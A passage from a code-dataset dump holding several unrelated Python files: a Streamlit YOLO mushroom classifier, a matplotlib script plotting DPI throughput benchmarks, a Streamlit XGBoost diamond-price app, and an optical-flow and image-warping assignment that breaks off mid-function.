"line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 63, "usage_type": "call"}, {"api_name": "upath.UPath", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.read_parquet", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "12636865764", "text": "import streamlit as st\nimport cv2\nimport numpy as np\nfrom yolo_predictions import YOLO_Pred\n\nyolo = YOLO_Pred('my_obj.onnx','my_obj.yaml')\nname = ['Agaricus',\n 'Amanita',\n 'Boletus',\n 'Cortinarius',\n 'Entoloma',\n 'Exidia',\n 'Hygrocybe',\n 'Inocybe',\n 'Lactarius',\n 'Pluteus',\n 'Russula',\n 'Suillus']\n\nst.title(\"การจำแนกชนิดของเห็ด : ภาพนิ่ง\")\nimg_file = st.file_uploader(\"โหลดไฟล์ภาพ\")\n\nif img_file is not None: \n file_bytes = np.asarray(bytearray(img_file.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n #----------------------------------------------\n pred_image, obj_box = yolo.predictions(img)\n \n if len(obj_box) > 0:\n b = []\n da =[]\n obj_names = ''\n for i in obj_box:\n b.append(i[4])\n for k in b:\n for j in name:\n if k==j:\n da.append(j)\n name.remove(j)\n for p in range(len(da)):\n obj_names = obj_names + da[p] + ' '\n text_obj = 'เห็ดที่ตรวจพบ : ' + obj_names\n else:\n text_obj = 'ไม่พบชนิดของเห็ด'\n #----------------------------------------------\n st.header(text_obj)\n st.image(pred_image, caption='ภาพ Output',channels=\"BGR\")\n \n", "repo_name": "jaroonsi62/YOLO_wed_app", "sub_path": "app1.py", "file_name": "app1.py", "file_ext": "py", "file_size_in_byte": 1453, "program_lang": "python", "lang": "th", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yolo_predictions.YOLO_Pred", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "streamlit.header", "line_number": 46, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "28098947973", "text": "#!/usr/bin/python3\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nfrom matplotlib import rcParams\nfrom collections import defaultdict\nfrom util_patterns import *\nfrom util_dataparse_throughput import *\nimport glob\nrcParams.update(params_line)\n\ndx = 0/72.; dy = -15/72. 
\noffset = matplotlib.transforms.ScaledTranslation(dx, dy, plt.gcf().dpi_scale_trans)\n\nall_tasks = [\"AC-DPI\", \"Hyperscan-DPI\", \"SmartNIC-DPI\"]\nall_ipsecs = [\"no_ipsec\", \"gcm_ipsec\", \"sha_ipsec\"]\nall_traces = [\"ICTF\", \"64B\", \"256B\", \"512B\", \"1KB\"]\nall_traces_pktsize = [\"64B\", \"256B\", \"512B\", \"1KB\"]\nall_cores = [\"1\", \"2\", \"4\", \"8\", \"16\"]\nall_rules = [\"1k\", \"5k\", \"10k\", \"20k\", \"30k\", \"33.5k\"]\n\ndef get_task(ori_name):\n switcher = {\n **dict.fromkeys([\"dpi\", \"dpi-ipsec\", \"dpi-ipsec-sha\"], \"AC-DPI\"), \n **dict.fromkeys([\"dpi-hs\", \"dpi-hs-ipsec\", \"dpi-hs-ipsec-sha\"], \"Hyperscan-DPI\"), \n **dict.fromkeys([\"hfa-se-maxperf-check\", \"hfa-se-maxperf-ipsec-check\", \"hfa-se-maxperf-ipsec-check-sha\"], \"SmartNIC-DPI\"), \n }\n return switcher.get(ori_name, \"Invalid task name %s\" % (ori_name,))\n\ndef get_ipsec(ori_name):\n no_ipsec_names = [\"firewall\", \"acl-fw\", \"hfa-se-maxperf-check\", \"dpi\", \"nat\", \"nat-tcp-v4\", \"maglev\", \"lpm\", \"monitor\", \"monitoring\", \"dpi-hs\"]\n gcm_ipsec_names = [\"firewall-ipsec\", \"acl-fw-ipsec\", \"hfa-se-maxperf-ipsec-check\", \"dpi-ipsec\", \"nat-ipsec\", \"nat-tcp-v4-ipsec\", \"maglev-ipsec\", \"lpm-ipsec\", \"monitor-ipsec\", \"monitoring-ipsec\", \"dpi-hs-ipsec\"]\n sha_ipsec_names = [\"firewall-ipsec-sha\", \"acl-fw-ipsec-sha\", \"hfa-se-maxperf-ipsec-check-sha\", \"dpi-ipsec-sha\", \"nat-ipsec-sha\", \"nat-tcp-v4-ipsec-sha\", \"maglev-ipsec-sha\", \"lpm-ipsec-sha\", \"monitor-ipsec-sha\", \"monitoring-ipsec-sha\", \"dpi-hs-ipsec-sha\"]\n \n switcher = {\n **dict.fromkeys(no_ipsec_names, \"no_ipsec\"), \n **dict.fromkeys(gcm_ipsec_names, \"gcm_ipsec\"),\n **dict.fromkeys(sha_ipsec_names, \"sha_ipsec\")\n }\n return switcher.get(ori_name, \"Invalid task name %s\" % (ori_name,))\n\ndef get_trace(ori_name):\n switcher = {\n **dict.fromkeys([\"ICTF\", \"ICTF_ACL\", \"ICTF_IPSEC\", \"ICTF_IPSEC_ACL\", \"ICTF_IPSEC_SHA\", \"ICTF_IPSEC_ACL_SHA\"], \"ICTF\"), \n **dict.fromkeys([\"CAIDA64\", \"CAIDA64_ACL\", \"CAIDA64_IPSEC\", \"CAIDA64_IPSEC_ACL\", \"CAIDA64_IPSEC_SHA\", \"CAIDA64_IPSEC_ACL_SHA\"], \"64B\"), \n **dict.fromkeys([\"CAIDA256\", \"CAIDA256_ACL\", \"CAIDA256_IPSEC\", \"CAIDA256_IPSEC_ACL\", \"CAIDA256_IPSEC_SHA\", \"CAIDA256_IPSEC_ACL_SHA\"], \"256B\"), \n **dict.fromkeys([\"CAIDA512\", \"CAIDA512_ACL\", \"CAIDA512_IPSEC\", \"CAIDA512_IPSEC_ACL\", \"CAIDA512_IPSEC_SHA\", \"CAIDA512_IPSEC_ACL_SHA\"], \"512B\"), \n **dict.fromkeys([\"CAIDA1024\", \"CAIDA1024_ACL\", \"CAIDA1024_IPSEC\", \"CAIDA1024_IPSEC_ACL\", \"CAIDA1024_IPSEC_SHA\", \"CAIDA1024_IPSEC_ACL_SHA\"], \"1KB\")\n }\n return switcher.get(ori_name, \"Invalid trace name %s\" % (ori_name,))\n\ndef get_core(ori_name):\n switcher = {\n **dict.fromkeys([\"0x1\", \"1\"], \"1\"), \n **dict.fromkeys([\"0x3\", \"2\"], \"2\"), \n **dict.fromkeys([\"0x7\", \"3\"], \"3\"), \n **dict.fromkeys([\"0xF\", \"4\"], \"4\"), \n **dict.fromkeys([\"0x1F\", \"5\"], \"5\"),\n **dict.fromkeys([\"0x3F\", \"6\"], \"6\"),\n **dict.fromkeys([\"0x7F\", \"7\"], \"7\"),\n **dict.fromkeys([\"0xFF\", \"8\"], \"8\"),\n **dict.fromkeys([\"0xFFF\", \"12\"], \"12\"),\n **dict.fromkeys([\"0xFFFF\", \"16\"], \"16\")\n }\n return switcher.get(ori_name, \"Invalid core name %s\" % (ori_name,))\n\ndef get_rule(ori_name):\n switcher = {\n **dict.fromkeys([\"1000\", \"1k\"], \"1k\"), \n **dict.fromkeys([\"5000\", \"5k\"], \"5k\"), \n **dict.fromkeys([\"10000\", \"10k\"], \"10k\"), \n **dict.fromkeys([\"20000\", \"20k\"], \"20k\"), \n 
**dict.fromkeys([\"30000\", \"30k\"], \"30k\"), \n **dict.fromkeys([\"33471\", \"full\"], \"33.5k\")\n }\n return switcher.get(ori_name, \"Invalid rule name %s\" % (ori_name,))\n\nt_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\navg_l_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\ntail_l_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\n\n# we report the median of the 10 runs. \n# type (nic, nb, sb) -> task -> ipsecs -> trace -> core -> median throughput/latency values for 10 runs\nt_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\navg_l_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\ntail_l_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\n\n# first load **all** files to the dict\ndef data_load(f_name):\n with open(f_name, 'r') as f:\n raw_entry = f.readline()\n while raw_entry:\n entry_array = raw_entry.rstrip(\"\\n\").split(\",\")\n # print(entry_array)\n _task = get_task(entry_array[0])\n _ipsec = get_ipsec(entry_array[0])\n _trace = get_trace(entry_array[1])\n _core = get_core(entry_array[2])\n _rule = get_rule(entry_array[3])\n _t = float(entry_array[4])\n _avg_l = float(entry_array[5])\n _tail_l = float(entry_array[6])\n t_val[_task][_ipsec][_trace][_core][_rule].append(float(_t))\n avg_l_val[_task][_ipsec][_trace][_core][_rule].append(float(_avg_l))\n tail_l_val[_task][_ipsec][_trace][_core][_rule].append(float(_tail_l))\n raw_entry = f.readline()\n # currently we only load the data of the first file\n # break \n\n# then process data to get graph drawing data\ndef process_draw_data():\n for _task in all_tasks:\n ipc_degrad = 1\n if _task == \"SmartNIC-DPI\":\n ipc_degrad = 1 - 0.0166\n for _ipsec in all_ipsecs:\n for _trace in all_traces:\n for _core in all_cores:\n for _rule in all_rules:\n try:\n t_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(t_val[_task][_ipsec][_trace][_core][_rule]) * ipc_degrad\n except IndexError:\n t_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n try:\n avg_l_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(avg_l_val[_task][_ipsec][_trace][_core][_rule]) / ipc_degrad\n except IndexError:\n avg_l_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n try:\n tail_l_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(tail_l_val[_task][_ipsec][_trace][_core][_rule]) / ipc_degrad\n except IndexError:\n tail_l_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n \ndef get_t_draw_data_vary_rule(_task, _ipsec, _trace, _core):\n data_vec = list()\n for _rule in all_rules:\n data_vec.append(t_val_med[_task][_ipsec][_trace][_core][_rule])\n return data_vec\n\ndef draw_t_bar_for_rule(_ipsec, _trace, _core):\n N = len(all_rules)\n ind = np.arange(N) * 10 + 10 # the x locations for the groups \n width = 6.0/N # the width of the bars: can also be len(x) sequence\n\n cnt = 0\n all_data_vec = []\n legends = list()\n for _task in all_tasks:\n data_vec = get_t_draw_data_vary_rule(_task, _ipsec, _trace, _core)\n p1, = plt.plot(ind, data_vec, linestyle = linestyles[cnt], marker = markers[cnt], markersize = markersizes[cnt],\n color=colors[cnt], linewidth=3)\n legends.append(p1)\n cnt += 1\n all_data_vec.append(data_vec)\n\n print('nic vs ac: 
{:.2f}'.format(all_data_vec[2][5]/all_data_vec[0][5]))\n print('nic vs hs: {:.2f}'.format(all_data_vec[2][5]/all_data_vec[1][5]))\n\n plt.legend(legends, all_tasks, frameon=False)\n plt.ylabel('Throughput (Mpps)')\n plt.xticks(ind, all_rules)\n\n # apply offset transform to all x ticklabels.\n for label in plt.axes().xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n plt.axes().grid(which='major', axis='y', linestyle=':')\n plt.axes().set_axisbelow(True)\n\n plt.tight_layout()\n plt.savefig('./figures/ac-hs/throughput/t_bar_%s_%s_%score.pdf' % (_ipsec, _trace, _core))\n plt.clf()\n\n \ndef get_t_draw_data_vary_trace(_task, _ipsec, _core, _rule):\n data_vec = list()\n for _trace in all_traces_pktsize:\n data_vec.append(t_val_med[_task][_ipsec][_trace][_core][_rule])\n return data_vec\n\ndef draw_t_bar_for_trace(_ipsec, _core, _rule):\n N = len(all_traces_pktsize)\n ind = np.arange(N) * 10 + 10 # the x locations for the groups \n width = 6.0/N # the width of the bars: can also be len(x) sequence\n\n cnt = 0\n legends = list()\n for _task in all_tasks:\n data_vec = get_t_draw_data_vary_trace(_task, _ipsec, _core, _rule)\n p1, = plt.plot(ind, data_vec, linestyle = linestyles[cnt], marker = markers[cnt], markersize = markersizes[cnt],\n color=colors[cnt], linewidth=3)\n legends.append(p1)\n cnt += 1\n\n plt.legend(legends, all_tasks, frameon=False)\n plt.ylabel('Throughput (Mpps)')\n plt.xticks(ind, all_traces_pktsize)\n\n # apply offset transform to all x ticklabels.\n for label in plt.axes().xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n plt.axes().grid(which='major', axis='y', linestyle=':')\n plt.axes().set_axisbelow(True)\n\n plt.tight_layout()\n plt.savefig('./figures/ac-hs/throughput/t_bar_%s_%score_%srule.pdf' % (_ipsec, _core, _rule))\n plt.clf()\n\nif __name__ == \"__main__\":\n plt.rc('text', usetex=True)\n font = fm.FontProperties(\n family = 'Gill Sans',\n fname = '/usr/share/fonts/truetype/adf/GilliusADF-Regular.otf')\n\n\n data_load(f'./{data_dir}/nic/ac-hs.res')\n data_load(f'./{data_dir}/nb/ac-hs.res')\n\n process_draw_data()\n draw_t_bar_for_rule(\"no_ipsec\", \"ICTF\", \"1\")\n draw_t_bar_for_trace(\"no_ipsec\", \"1\", \"33.5k\")\n draw_t_bar_for_trace(\"no_ipsec\", \"1\", \"1k\")\n", "repo_name": "YangZhou1997/sgxnic-figuredraw", "sub_path": "plot_ac_hs.py", "file_name": "plot_ac_hs.py", "file_ext": "py", "file_size_in_byte": 10282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.rcParams.update", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.transforms.ScaledTranslation", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 87, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 88, "usage_type": 
"call"}, {"api_name": "collections.defaultdict", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", 
"line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "192793888", "text": "import streamlit as st\r\nimport joblib\r\nimport numpy as np\r\nimport pandas as pd\r\nimport xgboost\r\n\r\n\r\nxgb_model = joblib.load('xgb_model.pkl')\r\n\r\n\r\n\r\nst.title('Diamond Price Prediction')\r\n\r\n\r\nst.write('### Explained of Data')\r\nst.write('**carat** : weight of the diamond (0.2--5.01)')\r\n\r\nst.write('**cut** : quality of the cut (Fair, Good, Very Good, Premium, Ideal)')\r\n\r\nst.write('**color** : diamond colour, from J (worst) to D (best)')\r\n\r\nst.write('**clarity** : a measurement of how clear the diamond is (I1 (worst), SI2, SI1, VS2, VS1, VVS2, VVS1, IF (best))')\r\n\r\nst.write('**x** : length in mm (0--10.74)')\r\n\r\nst.write('**y** : width in mm (0--58.9)')\r\n\r\nst.write('**z** : depth in mm (0--31.8)')\r\n\r\nst.markdown('')\r\nst.markdown('')\r\n\r\nst.markdown('##### Input carat value')\r\ncarat = st.slider('Carat', min_value=0.2, max_value=5.0, step=0.1)\r\n\r\nst.markdown('##### Input Clarity value')\r\noptions_clarity = ['I1', 'SI2', 'SI1', 'VS2', 'VS1', 'VVS2', 'VVS1', 'IF']\r\nclarity = st.selectbox(\r\n 'Clarity',\r\n options_clarity\r\n)\r\n\r\nst.markdown('##### Input Cut value')\r\ncut_options = ['Fair', 'Good', 'Very Good', 'Premium', 'Ideal']\r\ncut = st.selectbox(\r\n 'Cut',\r\n cut_options\r\n)\r\n\r\nst.markdown('##### Input Color value')\r\noptions_color = ['E', 'I', 'J', 'H', 'F', 'G', 'D']\r\ncolor = st.selectbox(\r\n 'Color',\r\n options_color)\r\n\r\nst.markdown('##### Input X value (in mm)')\r\nx = st.slider('X', min_value=0.0, max_value=11.0, step=0.1)\r\n\r\nst.markdown('##### Input Y value (in mm)')\r\ny = st.slider('Y', min_value=0.0, max_value=59.0, step=0.1)\r\n\r\nst.markdown('##### Input Z value (in mm)')\r\nz = st.slider('Z', min_value=0.0, max_value=32.0, step=0.1)\r\n\r\nif st.button(\"Predict\"):\r\n\r\n color_mapping = {'E': 1, 'I': 2, 'J': 3, 'H': 4, 'F': 5, 'G': 6, 'D': 7}\r\n features_color = color_mapping[color]\r\n\r\n clarity_mapping = {'I1': 1, 'SI2': 2, 'SI1': 3, 'VS2': 4, 'VS1': 5, 'VVS2': 6, 'VVS1': 7, 'IF': 8}\r\n features_clarity = clarity_mapping[clarity]\r\n\r\n cut_mapping = {'Fair': 1, 'Good': 2, 'Very Good': 3, 'Premium': 4, 'Ideal': 5}\r\n features_cut = cut_mapping[cut]\r\n\r\n\r\n # Prepare the input data as a feature vector\r\n features = [float(carat), float(features_cut), float(features_color), float(features_clarity), float(x), float(y), float(z)]\r\n input_data = np.array(features).reshape(1, -1)\r\n\r\n # Make the prediction using the loaded model\r\n # prediction = rf_model.predict(input_data)\r\n prediction = xgb_model.predict(input_data)\r\n\r\n # Display the prediction result\r\n st.success(f\"The predicted price is {prediction}\")\r\n", "repo_name": "NicoLe-01/data-mining-streamlit", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "joblib.load", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.title", 
"line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 24, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 31, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 52, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 57, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "20783380127", "text": "import math\nimport sys\nfrom typing import List\n\nimport numpy as np\nimport cv2\nfrom numpy.linalg import LinAlgError\n\nfrom scipy import signal\nimport matplotlib.pyplot as plt\n\n\ndef myID() -> np.int:\n \"\"\"\n Return my ID (not the friend's ID I copied from)\n :return: int\n \"\"\"\n return 207616830\n\n\n# ---------------------------------------------------------------------------\n# ------------------------ Lucas Kanade optical flow ------------------------\n# ---------------------------------------------------------------------------\n\n\ndef opticalFlow(im1: np.ndarray, im2: np.ndarray, step_size=10,\n win_size=5) -> (np.ndarray, np.ndarray):\n \"\"\"\n Given two images, returns the Translation from im1 to im2\n :param im1: Image 1\n :param im2: Image 2\n :param step_size: The image sample size\n :param win_size: The optical flow window size (odd number)\n :return: Original points [[x,y]...], [[dU,dV]...] 
for each points\n \"\"\"\n points = []\n uv = []\n\n # RGB -> GRAY & normalize\n imGray1 = cv2.cvtColor(im1, cv2.COLOR_RGB2GRAY) if len(im1.shape) > 2 else im1\n imGray2 = cv2.cvtColor(im2, cv2.COLOR_RGB2GRAY) if len(im2.shape) > 2 else im2\n\n # kernel to get t: I2 - I1\n kernel_t = np.array([[1., 1.], [1., 1.]]) * .25\n s = int(win_size / 2)\n\n # convolve img with kernel to derivative\n fx = cv2.Sobel(im2, cv2.CV_64F, 1, 0, ksize=3,\n borderType=cv2.BORDER_DEFAULT)\n fy = cv2.Sobel(im2, cv2.CV_64F, 0, 1, ksize=3,\n borderType=cv2.BORDER_DEFAULT)\n ft = signal.convolve2d(imGray2, kernel_t, boundary='symm', mode='same') + signal.convolve2d(imGray1, -kernel_t,\n boundary='symm',\n mode='same')\n # for each point, calculate Ix, Iy, It\n # by moving the kernel over the image\n (rows, cols) = imGray1.shape\n for i in range(s, rows - s, step_size):\n for j in range(s, cols - s, step_size):\n # get the derivative in the kernel location\n Ix = fx[i - s:i + s + 1, j - s:j + s + 1].flatten()\n Iy = fy[i - s:i + s + 1, j - s:j + s + 1].flatten()\n It = ft[i - s:i + s + 1, j - s:j + s + 1].flatten()\n\n Atb = [[-(Ix * It).sum()], [-(Iy * It).sum()]]\n AtA = [[(Ix * Ix).sum(), (Ix * Iy).sum()],\n [(Ix * Iy).sum(), (Iy * Iy).sum()]]\n lambdas = np.linalg.eigvals(AtA)\n l1 = np.max(lambdas)\n l2 = np.min(lambdas)\n if l1 >= l2 > 1 and (l1 / l2) < 100:\n nu = np.matmul(np.linalg.pinv(AtA), Atb) # (AtA)^-1 * Atb\n points.append([j, i]) # origin location\n uv.append([nu[0, 0], nu[1, 0]]) # new location\n return np.asarray(points), np.asarray(uv)\n\n\ndef opticalFlowPyrLK(img1: np.ndarray, img2: np.ndarray, k: int,\n stepSize: int, winSize: int) -> np.ndarray:\n \"\"\"\n :param img1: First image\n :param img2: Second image\n :param k: Pyramid depth\n :param stepSize: The image sample size\n :param winSize: The optical flow window size (odd number)\n :return: A 3d array, with a shape of (m, n, 2),\n where the first channel holds U, and the second V.\n Ui = Ui + 2 ∗ Ui−1, Vi = Vi + 2 ∗ Vi−1\n \"\"\"\n pyr1 = gaussianPyr(img1, k) # gauss pyramid for img1\n pyr2 = gaussianPyr(img2, k) # gauss pyramid for img2\n currImg = np.zeros(\n (pyr1[k - 2].shape[0], pyr1[k - 2].shape[1], 2)) # (m,n,2) zero array to put in u,v for each pixel\n lastImg = np.zeros((pyr1[k - 1].shape[0], pyr1[k - 1].shape[1], 2))\n\n points, uv = opticalFlow(pyr1[k - 1], pyr2[k - 1], stepSize, winSize)\n for j in range(len(points)): # change pixels uv by formula\n y, x = points[j]\n u, v = uv[j]\n lastImg[x, y, 0] = u\n lastImg[x, y, 1] = v\n\n for i in range(k - 2, -1, -1): # for each level of pyramids (small -> big)\n points, uv = opticalFlow(pyr1[i], pyr2[i], stepSize, winSize) # uv for i'th img\n for j in range(len(points)): # change pixels uv by formula\n y, x = points[j]\n u, v = uv[j]\n currImg[x, y, 0] = u\n currImg[x, y, 1] = v\n for z in range(lastImg.shape[0]):\n for r in range(lastImg.shape[1]):\n currImg[z * 2, r * 2, 0] += lastImg[z, r, 0] * 2\n currImg[z * 2, r * 2, 1] += lastImg[z, r, 1] * 2\n\n lastImg = currImg.copy()\n if i - 1 >= 0:\n currImg.fill(0)\n currImg.resize((pyr1[i - 1].shape[0], pyr1[i - 1].shape[1], 2))\n\n return currImg\n\n\n# ---------------------------------------------------------------------------\n# ------------------------ Image Alignment & Warping ------------------------\n# ---------------------------------------------------------------------------\n\n\n# ------------------ Help functions ----------------------\n\ndef getWarpMatrix(method, theta, tx, ty) -> np.ndarray:\n \"\"\"\n\n :param method: 
rigid / trans / rigid_opp\n :param theta: angle (for trans put 0)\n :param tx: move x\n :param ty: move y\n :return: correct warping matrix\n \"\"\"\n if method == \"rigid\":\n return np.array([[np.cos(theta), -np.sin(theta), tx],\n [np.sin(theta), np.cos(theta), ty],\n [0, 0, 1]], dtype=np.float64)\n elif method == \"trans\":\n return np.array([[1, 0, tx],\n [0, 1, ty],\n [0, 0, 1]], dtype=np.float64)\n elif method == \"rigid_opp\":\n return np.array([[np.cos(theta), np.sin(theta), 0],\n [-np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]], dtype=np.float64)\n\n\ndef findTheta(im1: np.ndarray, im2: np.ndarray) -> float:\n \"\"\"\n find angle of rotation between im1 to im2\n :param im1:\n :param im2:\n :return: theta\n \"\"\"\n min_mse = 1000\n theta = 0\n\n # find best angle\n for t in range(360):\n matrix_rigid = getWarpMatrix(\"rigid\", t, 0, 0)\n curr_rigid_img = cv2.warpPerspective(im1, matrix_rigid, im1.shape[::-1]) # warp img\n mse = 